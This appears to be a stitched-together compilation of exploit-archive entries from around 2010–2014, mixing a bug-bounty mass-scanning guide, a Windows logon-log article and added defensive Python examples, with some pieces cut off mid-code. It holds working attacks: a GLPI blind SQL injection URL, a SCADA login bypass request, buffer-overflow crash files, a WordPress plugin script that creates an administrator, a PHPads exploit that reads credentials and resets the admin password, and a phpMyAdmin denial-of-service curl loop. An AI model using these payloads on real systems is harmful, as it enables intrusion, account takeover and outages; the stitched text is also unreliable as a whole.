
# Exploit Title: GLPI 0.85 Blind SQL Injection
# Date: 28-11-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://forge.indepnet.net/attachments/download/1899/glpi-0.85.tar.gz
# CVE: CVE-2014-9258
# Category: webapps
  
1. Description
  
$_GET['condition'] is not escaped correctly.

File: ajax\getDropdownValue.php
if (isset($_GET['condition']) && !empty($_GET['condition'])) {
   $_GET['condition'] = rawurldecode(stripslashes($_GET['condition']));
}
if (isset($_GET['condition']) && ($_GET['condition'] != '')) {
   $where .= " AND ".$_GET['condition']." ";
}
$query = "SELECT `$table`.* $addselect
         FROM `$table`
         $addjoin
         $where
         ORDER BY $add_order `$table`.`completename`
         $LIMIT";

if ($result = $DB->query($query)) {

}

http://security.szurek.pl/glpi-085-blind-sql-injection.html

2. Proof of Concept

http://glpi-url/ajax/getDropdownValue.php?itemtype=group&condition=1 AND id = (SELECT IF(substr(password,1,1) = CHAR(36), SLEEP(5), 0) FROM `glpi_users` WHERE ID = 2)

3. Solution:
  
Update to version 0.85.1
http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gz
            

0x01 Description

The platform used this time is https://chaos.projectdiscovery.io/, which aggregates the major foreign bug bounty platforms. The current asset scale is about 16,000,000 to 18,000,000, a frightening number that grows or shrinks every hour. It also connects to many third-party self-built bounty platforms, which is more than you could collect on your own, so the chance of finding something is higher.

0x02 Automation workflow

A script fetches all assets from the ProjectDiscovery platform, so asset reconnaissance and collection are delegated to ProjectDiscovery. The downloaded assets are compared with the previous master domain data to decide whether new assets have appeared. If so, the new assets are extracted into a temporary file and appended to the master domain list. naabu scans their ports, the open ports are verified with httpx to extract the live HTTP assets, and those are sent to nuclei for vulnerability scanning and to xray as well. By default xray's basic crawler is used to scan for common vulnerabilities, and its results are saved to xray-new-$(date +%F-%T).html. A webhook can be added so that xray's results are pushed at the same time as nuclei's, and notify pushes everything in real time. All of this runs automatically.

0x03 Preparation

First install these tools and set up symlinks so they can be used globally. Installing them is very simple and is not covered again here; GitHub also has installation tutorials.

CentOS 7 64-bit, 4 cores / 4 GB [one server]
chaospy [asset detection, asset download] https://github.com/photonbolt/chaospy
unzip
anew [deduplication] https://github.com/tomnomnom/anew
naabu [port scan] https://github.com/projectdiscovery/naabu
httpx [liveness detection] https://github.com/projectdiscovery/httpx
nuclei [vulnerability scan] https://nuclei.projectdiscovery.io/
xray [vulnerability scan]
notify [vulnerability notification] notify's push solution is relatively mature
Server: Vultr is recommended; you can use my referral link: https://www.vultr.com/?ref=9059107-8h

0x04 Notify configuration

Install and configure notify: https://github.com/projectdiscovery/notify

Configuration file (create it if it does not exist): /root/.config/notify/provider-config.yaml

You only need to modify the notification configuration. For example, the notifications I use are Telegram and email (you can configure any provider).

Test result:

subfinder -d hackerone.com | notify -provider telegram

This sets up Telegram notifications. If you receive the result after the run completes, notify is working and you can move on to the next step.

0x05 Deployment process

Make sure the tools above are installed. Next, create the shell script file; this script carries out the whole process described above.

Name: wadong.sh. Add execute permission: chmod +x wadong.sh

wadong.sh mainly performs asset reconnaissance and collection, port scanning, deduplication, liveness detection, vulnerability scanning and result notification.

Script:

#!/bin/bash
# wadong.sh: asset collection, comparison against the cache, port scan,
# liveness detection, vulnerability scan and result notification

# Use chaospy to download bounty asset data only
#python3 chaospy.py --download-hackerone
#python3 chaospy.py --download-rewards   # download all bounty assets
#./chaospy.py --download-bugcrowd    download Bugcrowd assets
#./chaospy.py --download-hackerone   download HackerOne assets
#./chaospy.py --download-intigriti   download Intigriti assets
#./chaospy.py --download-external    download self-hosted program assets
#./chaospy.py --download-swags       download swag-only assets
#./chaospy.py --download-rewards     download assets with rewards
#./chaospy.py --download-norewards   download assets without rewards

# Unzip the downloads, then use awk to compare them with the last results and see whether anything is new
if ls | grep '.zip' > /dev/null; then
    unzip '*.zip' > /dev/null
    cat *.txt > newdomains.md
    rm -f *.txt
    # keep only the lines of newdomains.md that are not already in the alltargets.txtls cache
    awk 'NR==FNR{lines[$0];next} !($0 in lines)' alltargets.txtls newdomains.md > domains.txtls
    rm -f newdomains.md
    ##########################################################################
    echo "Asset reconnaissance finished $(date +%F-%T)" | notify -silent -provider telegram
    echo "Found new domains: $(wc -l < domains.txtls)" | notify -silent -provider telegram
    ##########################################################################
    nuclei -silent -update
    nuclei -silent -ut
    rm -f *.zip
else
    echo "No new programs found" | notify -silent -provider telegram
fi

if [ -s domains.txtls ]; then
    echo "Scanning the ports of the new assets with naabu" | notify -silent -provider telegram
    fine_line=$(wc -l < domains.txtls)
    num=1
    k=10000
    # scan the new domains in chunks of k lines
    while [ "$num" -le "$fine_line" ]; do
        m=$((num + k))
        sed -n "${num},${m}p" domains.txtls > domaint.txtls
        num=$((m + 1))
        naabu -stats -l domaint.txtls -p 80,443,8080,2053,2087,2096,8443,2083,2086,2095,880,2052,2082,3443,8791,8887,8888,444,9443,2443,100,10001,8082,8444,200,8081,8445,8446,8447 -silent -o open-domain.txtls > /dev/null
        echo "Port scan finished, starting httpx to detect live hosts" | notify -silent -provider telegram
        httpx -silent -stats -l open-domain.txtls -fl 0 -mc 200,302,403,404,204,303,400,401 -o newurls.txtls > /dev/null
        echo "httpx found live assets: $(wc -l < newurls.txtls)" | notify -silent -provider telegram
        cat newurls.txtls >> "new-active-$(date +%F-%T).txt"   # save a record of the new assets
        cat domaint.txtls >> alltargets.txtls
        echo "Live assets appended to the history cache $(date +%F-%T)" | notify -silent -provider telegram
        echo "Starting nuclei scan of the new assets" | notify -silent -provider telegram
        cat newurls.txtls | nuclei -rl 300 -bs 35 -c 30 -mhe 10 -ni -o res-all-vulnerability-results.txt -stats -silent -severity critical,medium,high,low | notify -silent -provider telegram
        echo "Nuclei vulnerability scan finished" | notify -silent -provider telegram
        # xray scan: remember to configure the webhook, otherwise remove that option and save to a file only
        #echo "Scanning the new assets with xray" | notify -silent -provider telegram
        #xray_linux_amd64 webscan --url-file newurls.txtls --webhook-output http://www.qq.com/webhook --html-output "xray-new-$(date +%F-%T).html"
        #echo "Xray vulnerability scan finished, view the xray report on the server" | notify -silent -provider telegram
        rm -f open-domain.txtls domaint.txtls newurls.txtls
    done
    rm -f domains.txtls
else
    ##########################################################################
    # send a notification that no new domains were found
    echo "No new domains $(date +%F-%T)" | notify -silent -provider telegram
fi

Build the first.sh file. This script runs only once and is not used afterwards; it is mainly used to generate the history cache of domains the first time, marking them as old assets.

Add execute permission: chmod +x first.sh

#!/bin/bash
# Use chaospy to download bounty asset data only
./chaospy.py --download-new
./chaospy.py --download-rewards
# Unzip the downloads
if ls | grep '.zip' > /dev/null; then
    unzip '*.zip' > /dev/null
    rm -f alltargets.txtls
    cat *.txt > alltargets.txtls
    rm -f *.txt
    rm -f *.zip
    echo "Found domains: $(wc -l < alltargets.txtls), saved as cache file alltargets.txtls"
fi

0x06 Start the bounty automation

Once you have confirmed that all the tools above are installed:

1. Run the first.sh script to generate enough cached domain names locally, marking them as old assets

./first.sh

2. Run the bbautomation.sh script in a loop, sleeping 3600 seconds so it runs once an hour, i.e. the script

xunhuan.sh:

#!/bin/bash
while true; do ./wadong.sh; sleep 3600; done

3. The chaospy script was roughly modified to optimise the delayed scan time and error reporting. The modified chaospy.py:

magenta = '\033[35m'
cyan = '\033[36m'
lightgray = '\033[37m'
darkgray = '\033[90m'
lightred = '\033[91m'
lightgreen = '\033[92m'
lightyellow = '\033[93m'
lightblue = '\033[94m'
lightmagenta = '\033[95m'
lightcyan = '\033[96m'
white = '\033[97m'
default = '\033[0m'
parser = argparse.ArgumentParser(description='chaospy tool')
parser.add_argument('--list', dest='list', help='List all programs', action='store_true')
parser.add_argument('--list-bugcrowd', dest='list_bugcrowd', help='List Bugcrowd programs', action='store_true')
parser.add_argument('--list-hackerone', dest='list_hackerone', help='List HackerOne programs', action='store_true')
parser.add_argument('--list-intigriti', dest='list_intigriti', help='List Intigriti programs', action='store_true')
parser.add_argument('--list-external', dest='list_external', help='List self-hosted programs', action='store_true')
parser.add_argument('--list-swags', dest='list_swags', help='List programs with swag offers', action='store_true')
parser.add_argument('--list-rewards', dest='list_rewards', help='List programs with rewards', action='store_true')
parser.add_argument('--list-norewards', dest='list_norewards', help='List programs without rewards', action='store_true')
parser.add_argument('--list-new', dest='list_new', help='List new programs', action='store_true')
parser.add_argument('--list-updated', dest


Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit


Vendor: Soitec
Product web page: http://www.soitec.com
Affected version: 1.4 and 1.3

Summary: Soitec power plants are a profitable and ecological investment
at the same time. Using Concentrix technology, Soitec offers a reliable,
proven, cost-effective and bankable solution for energy generation in the
sunniest regions of the world. The application shows how Concentrix technology
works on the major powerplants managed by Soitec around the world. You will
be able to see for each powerplant instantaneous production, current weather
condition, 3 day weather forecast, Powerplant webcam and Production data history.

Desc: Soitec SmartEnergy web application suffers from an authentication bypass
vulnerability using SQL Injection attack in the login script. The script fails
to sanitize the 'login' POST parameter allowing the attacker to bypass the security
mechanism and view sensitive information that can be further used in a social
engineering attack.

Tested on: nginx/1.6.2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Vendor status:

[16.11.2014] Vulnerability discovered.
[02.12.2014] Vendor contacted.
[08.12.2014] Vendor responds asking more details.
[08.12.2014] Sent details to the vendor.
[09.12.2014] Vendor confirms the vulnerability.
[12.12.2014] Vendor applies fix to version 1.4.
[14.12.2014] Coordinated public security advisory released.


Advisory ID: ZSL-2014-5216
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5216.php


16.11.2014

---



POST /scada/login HTTP/1.1
Host: smartenergy.soitec.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smartenergy.soitec.com/scada/login
Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah
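Why the request above gets past the login, shown in Python with sqlite3 as an added example (not code from the Soitec or the GLPI advisory): the string-built login check the Soitec script uses beside its parameterised form, plus a key-based allow-list for a client-chosen condition of the kind GLPI 0.85 concatenated into its WHERE clause. The table rows, column names and condition map are constructed.

```python
# Added example: vulnerable and hardened query construction side by side.
import re
import sqlite3


def make_db():
    """In-memory stand-in for the application's user table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    db.executemany("INSERT INTO users (login, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("operator", "plant-42")])
    return db


def login_vulnerable(db, login, password):
    """String-built query, as in the Soitec login script. A login value of
    ' or 1=1-- closes the quoted literal, adds a tautology and comments out
    the password comparison, so the first user row comes back regardless."""
    sql = "SELECT login FROM users WHERE login='%s' AND password='%s'" % (login, password)
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, login, password):
    """Bound parameters: the driver sends the values separately from the SQL
    text, so the quote and the comment marker are just characters in a string."""
    row = db.execute("SELECT login FROM users WHERE login=? AND password=?",
                     (login, password)).fetchone()
    return row[0] if row else None


# GLPI 0.85 appended $_GET['condition'] to its WHERE clause verbatim. When the
# client really must choose a condition, keep the SQL fragments server-side and
# let the client send only a key. (Map contents are constructed.)
DROPDOWN_CONDITIONS = {
    "active": "`glpi_groups`.`is_active` = 1",
    "visible": "`glpi_groups`.`is_visible` = 1",
}
TABLE_NAME = re.compile(r"[a-z_]+")


def dropdown_query(table, condition_key):
    """Build the dropdown query from an allow-listed table name and condition key."""
    if not TABLE_NAME.fullmatch(table):
        raise ValueError("bad table name")
    condition = DROPDOWN_CONDITIONS.get(condition_key)
    if condition is None:
        raise ValueError("unknown condition")
    return ("SELECT `%s`.* FROM `%s` WHERE 1 AND %s ORDER BY `%s`.`completename`"
            % (table, table, condition, table))


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 1=1--", "blah"))  # admin: bypassed
    print(login_safe(db, "' or 1=1--", "blah"))        # None: rejected
    print(dropdown_query("glpi_groups", "active"))
```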
            
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680

#    EAX 0012E508
#    ECX 43434343
#    EDX 00000000
#    EBX 43434343
#    ESP 0012E4A4
#    EBP 0012E4F4
#    ESI 0012E508
#    EDI 00000000

#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh  = ("C" * 4)
junk = ("D" * 60)

f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + junk)
f.close()
            
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680

#    EAX 0012E788
#    ECX 43434343
#    EDX 00000000
#    EBX 43434343
#    ESP 0012E724
#    EBP 0012E774
#    ESI 0012E788
#    EDI 00000000

#!/usr/bin/python

buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh  = ("C" * 4)
junk = ("D" * 60)

f= open("exploit.lst",'w')
f.write(buffer + nseh + seh + junk)
f.close()
            
# jaangle 0.98i.977   Denial of Service Vulnerability
# Author: hadji samir        , s-dz@hotmail.fr
# Download : http://www.jaangle.com/downloading?block
# Tested : Windows 7 (fr)
# DATE   : 2012-12-13
#

################################################################### 
 

EAX 000000C0
ECX 00000000
EDX 00000000
EBX 00000003
ESP 01C5FE28
EBP 01C5FF88
ESI 00000002
EDI 002B4A98
EIP 776964F4 ntdll.KiFastSystemCallRet
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDC000(8000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

#!/usr/bin/python

buff = ("\x41" * 30000 )

f = open("exploit.m3u",'w')
f.write( buff )
f.close()
            
#!/usr/bin/python
#
# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
#
# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
#
# Exploit written by Claudio Viviani
#
#
# 2014-12-03:  Discovered vulnerability
# 2014-12-04:  Patch released (2.7.5)
#
# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
#
# function wpdm_ajax_call_exec()
# {
#    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#             echo "function not defined!";
#         die();
#     }
# }
#
# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
#
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#         ...
#         ...
#         ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
#     (mixed) (required) An array of user data, stdClass or WP_User object.
#        Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wordpress-download"
#
# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
# File checks
import os
import sys
# String manipulator
import string, random
# Args management
import optparse

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url

# Check that the file exists and is readable
def checkfile(file):
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file

def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

banner = """
    ___ ___               __
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
   |:      |    ______      |__|              __                __
   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
               |.  |    |_____|________|__|__|__|_____|___._|_____|
               |:  1    /   ___ ___
               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.
               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|
                           |. \_/  |___._|__|__|___._|___  |_____|__|
                           |:  |   |                 |_____|
                           |::.|:. |
                           `--- ---'
                                                   Wordpress Download Manager
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                          v2.7.0-2.7.4

                               Written by:

                             Claudio Viviani

                          http://www.homelab.it

                             info@homelab.it
                         homelabit@protonmail.ch

                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

host = checkurl(options.target)
timeout = options.timeout

print(banner)

socket.setdefaulttimeout(timeout)

username = id_generator()
pwd = id_generator()

body = urllib.urlencode({'action' : 'wpdm_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

print "[+] Trying to connect to: "+host
try:
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()

    if html == "":
       print("[!] Account Added")
       print("[!] Location: "+host+"/wp-login.php")
       print("[!] Username: "+username)
       print("[!] Password: "+pwd)
    else:
       print("[X] Exploitation Failed :(")

except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))
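The dispatch pattern the comments above describe, reproduced in Python as an added example (not the plugin's or the exploit's code): a function looked up by a request-supplied name with existence as the only check, beside an allow-list dispatcher behind a request-validity check. Handler names and request dictionaries are constructed, and nonce_ok stands in for WordPress's own nonce and capability checks.

```python
# Added example: the wpdm_ajax_call_exec() pattern in Python. Handlers, request
# data and the nonce_ok flag are constructed stand-ins.
from typing import Callable, Dict


def add_user(post: dict) -> dict:
    """Stand-in for wp_insert_user(): a privileged function that merely exists."""
    return {"created": post.get("user_login"), "role": post.get("role", "subscriber")}


def list_packages(post: dict) -> dict:
    """Stand-in for a handler the AJAX endpoint is actually meant to expose."""
    return {"packages": ["pkg-1", "pkg-2"]}


def ajax_call_vulnerable(post: dict):
    """Mirrors the plugin: function_exists() then call_user_func($_POST['execute'], $_POST).
    Existence is the only check, so any reachable function can be invoked with
    attacker-shaped arguments, including one that creates an administrator."""
    if post.get("action") != "wpdm_ajax_call":
        return None
    fn = globals().get(post.get("execute", ""))
    if callable(fn):
        return fn(post)
    return "function not defined!"


# Only the handlers the endpoint is designed to expose, keyed by a public name.
AJAX_HANDLERS: Dict[str, Callable[[dict], dict]] = {
    "list_packages": list_packages,
}


def ajax_call_hardened(post: dict, nonce_ok: bool):
    """Allow-list dispatch behind a request-validity check. nonce_ok stands in
    for check_ajax_referer()/current_user_can() (assumed, not the plugin's code)."""
    if post.get("action") != "wpdm_ajax_call":
        return None
    if not nonce_ok:
        return "forbidden"
    fn = AJAX_HANDLERS.get(post.get("execute", ""))
    if fn is None:
        return "function not defined!"
    return fn(post)


# The "Evil POST Data" from the advisory, as a dictionary.
EVIL_POST = {"action": "wpdm_ajax_call", "execute": "add_user",
             "user_login": "NewAdminUser", "user_pass": "NewAdminPassword",
             "role": "administrator"}

if __name__ == "__main__":
    print(ajax_call_vulnerable(EVIL_POST))          # administrator created
    print(ajax_call_hardened(EVIL_POST, True))      # function not defined!
```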
            
<title> PHPads Authentication Bypass  Exploit </title>
<pre>
PHPads Authentication Bypass / Administrator Password Change Exploit
<form method="POST">
Target  : <br><input type="text" name="target" value="<?php echo isset($_POST['target']) ? htmlspecialchars($_POST['target']) : 'http://localhost:4545/phpads'; ?>" size="70" /><br /><input type="submit" name="submit" />
</form>
<?php
function catchya($string, $start, $end)
{
	// extract the text between $start and $end; empty string when there is no match
	if (preg_match('/'.preg_quote($start, '/').'(.*)'.preg_quote($end, '/').'/', $string, $matches)) {
		return $matches[1];
	}
	return '';
}

function login($target)
{
	// ads.dat holds the credentials in plain text and is served over HTTP
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $target."/ads.dat");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	$result = curl_exec($ch);
	curl_close($ch);
	$username = catchya($result, "user=", "\n");
	$password = catchya($result, "pass=", "\n");
	return array($username, $password);
}

function adminchange($target, $username, $password)
{
	$post = array('save' => '1',
	'newlogin' => $username,
	'newpass' => "htlover");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $target);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_COOKIE, 'user='.$username.'; pass='.$password);
	curl_setopt($ch, CURLOPT_POST, true);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
	$result = curl_exec($ch);
	curl_close($ch);
	if(preg_match("/Code Generator/", $result))
	{
		return "<br><br><font color=green>Success !! Password changed </font><br>username: ".$username." | password: htlover";
	}else{
		return "Something wrong <br>";
	}
}

if (isset($_POST['submit']))
{
	$target = $_POST['target'];
	//login($target, $username, $userid);
	$logins = login($target);
	echo "USERNAME :" . $logins[0]; // username
	echo "<br>PASSWORD :" . $logins[1]; // password
	echo adminchange($target.'/admin.php?action=config', $logins[0], $logins[1]);
}




?>
</pre>
            
=============
DESCRIPTION:
=============
A vulnerability present in phpMyAdmin 4.0.x before 4.0.10.7, 4.1.x
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to
cause a denial of service (resource consumption) via a long password.
CVE-2014-9218 was assigned.

=============
Time Line:
=============
December 3, 2014 - A phpMyAdmin update and the security advisory is
published.

=============
Proof of Concept:
=============

*1 - Create the payload.*

$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload

*2 - Performing the Denial of Service attack.*

$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done

=============
Authors:
=============

-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
=============
References:
=============

* http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php
            

1. Overview

1.1 Case

Let's first look at two screenshots. From them you can see a successful logon whose type is 3, meaning a network logon, and to most people 4624 means success. So what actually happened? There is some ambiguity here, and today I will go through the details.

1.2 Principle

When a user connects over the SMB protocol and is prompted for a password, the SMB connection is first made with the anonymous user (ANONYMOUS LOGON), and that network connection is recorded as successful. This log entry is generated under the following conditions:

The logon user is ANONYMOUS LOGON

The logon process is NtLmSsp

The protocol used is NTLM V1

The logon protocol is SMB

2. Tests

2.1 SMB connection failure

2.1.1 Network name not found / access denied

Using net use directly to connect to a share AAA$ that does not exist reports the error that the network name cannot be found. Running net use also shows that the connection did not succeed.

But look at the log: a 4624 type 3 successful logon is generated, meaning the anonymous user logged on to the network successfully.

Using the correct directory path but not supplying a user reports an error and access is denied, and this state also produces a successful logon for the anonymous user, type 3.

2.1.2 Wrong username or password

Logging on with a wrong account password reports that the username or password is incorrect.

In this case there is no anonymous logon success in the log; a 4625 appears directly, and of course the username used to log on is shown.

2.2 SMB logon success

If you use the correct account credentials to log on, what does that look like in the log?

Besides the type 3 logon success, there are 4776 (credential validation) and 4672 (special privileges assigned to the logon).

3. Summary

When an attacker connects over SMB, a 4624 for the anonymous user (ANONYMOUS LOGON) is generated whenever the access path does not exist or the account does not exist.

4624 does not necessarily mean the attacker logged on successfully. You need to examine the log context, combining the IP field, the TargetUser field, the user and many other fields. System authentication sometimes produces a high volume of 4624 alerts (the fields above describe the meaning; the exact field names are complicated and I cannot remember them precisely).
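The four conditions and the context checks above, turned into a small triage routine as an added example (not from the original article): it marks a 4624 as anonymous SMB noise only when every condition holds, and grades each source IP by whether a named type 3 logon is backed by 4776/4672, whether a 4625 shows a wrong password, or whether nothing but anonymous 4624s came from it. All events are constructed; attribute names follow the 4624 EventData fields, and 4776 (which carries a workstation name rather than an IP) is mapped to the IP here only for the example.

```python
# Added example: triage of Windows Security events per the article's conditions.
# Every event below is constructed; it is not real telemetry.
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class SecurityEvent:
    event_id: int            # 4624 success, 4625 failure, 4776 credential validation, 4672 privileges
    ip_address: str          # IpAddress
    target_user: str = ""    # TargetUserName
    logon_type: int = 0      # LogonType (3 = network, which SMB uses)
    logon_process: str = ""  # LogonProcessName
    auth_package: str = ""   # AuthenticationPackageName
    lm_package: str = ""     # LmPackageName


def is_anonymous_smb_logon(ev: SecurityEvent) -> bool:
    """True when a 4624 matches every condition the article lists."""
    return (ev.event_id == 4624
            and ev.logon_type == 3
            and ev.target_user.upper() == "ANONYMOUS LOGON"
            and ev.logon_process.lower() == "ntlmssp"
            and ev.auth_package.upper() == "NTLM"
            and ev.lm_package.upper() == "NTLM V1")


def triage(events):
    """One verdict per source IP, using the context the article says to check:
    'successful-logon' - a named type 3 4624 backed by 4776 and/or 4672
    'failed-logon'     - a 4625, i.e. wrong username or password
    'anonymous-only'   - nothing but anonymous 4624s (bad share name, no credentials)
    'review'           - anything else, e.g. a named 4624 with no corroboration"""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev.ip_address].append(ev)
    verdicts = {}
    for ip, evs in by_ip.items():
        named = [e for e in evs if e.event_id == 4624 and e.logon_type == 3
                 and not is_anonymous_smb_logon(e)]
        corroborated = any(e.event_id in (4776, 4672) for e in evs)
        if named and corroborated:
            verdicts[ip] = "successful-logon"
        elif any(e.event_id == 4625 for e in evs):
            verdicts[ip] = "failed-logon"
        elif evs and all(is_anonymous_smb_logon(e) for e in evs):
            verdicts[ip] = "anonymous-only"
        else:
            verdicts[ip] = "review"
    return verdicts


SAMPLE_EVENTS = [
    # net use against a share that does not exist: a 4624 is still written
    SecurityEvent(4624, "10.0.0.5", "ANONYMOUS LOGON", 3, "NtLmSsp", "NTLM", "NTLM V1"),
    # wrong password for a real account: 4625 with the account name, no anonymous 4624
    SecurityEvent(4625, "10.0.0.6", "bob", 3, "NtLmSsp", "NTLM", "-"),
    # real logon: 4776 credential validation, named 4624, 4672 privileges
    SecurityEvent(4776, "10.0.0.7", "alice"),
    SecurityEvent(4624, "10.0.0.7", "alice", 3, "NtLmSsp", "NTLM", "NTLM V2"),
    SecurityEvent(4672, "10.0.0.7", "alice"),
]

if __name__ == "__main__":
    for ip, verdict in sorted(triage(SAMPLE_EVENTS).items()):
        print(ip, verdict)
```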

Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
Injection Vulnerabilities

Author: Adler Freiheit
Discovered: 11 June 2014
Updated: 11 December 2014
Published: 11 December 2014
Vendor: Montala Limited
Vendor url: www.resourcespace.org
Software: ResourceSpace Digital Asset Management Software
Versions: 6.4.5976 and prior
Status: Unpatched
Vulnerable scripts:
/pages/themes.php
/pages/preview.php
/pages/help.php
/pages/search.php
/pages/user_password.php
/pages/user_request.php
(and probably others)

Description:
ResourceSpace is vulnerable to Cross-Site Scripting, HTML and SQL
injection attacks, and insecure cookie handling. The scripts fail to
properly sanitize user-supplied input and to check the network protocol
used to access the site.

Vulnerability: SC-1414
Name: Cross Site Scripting (XSS)
Type: Application
Asset Group: Multiple
Source: SureCloud
IP Address:
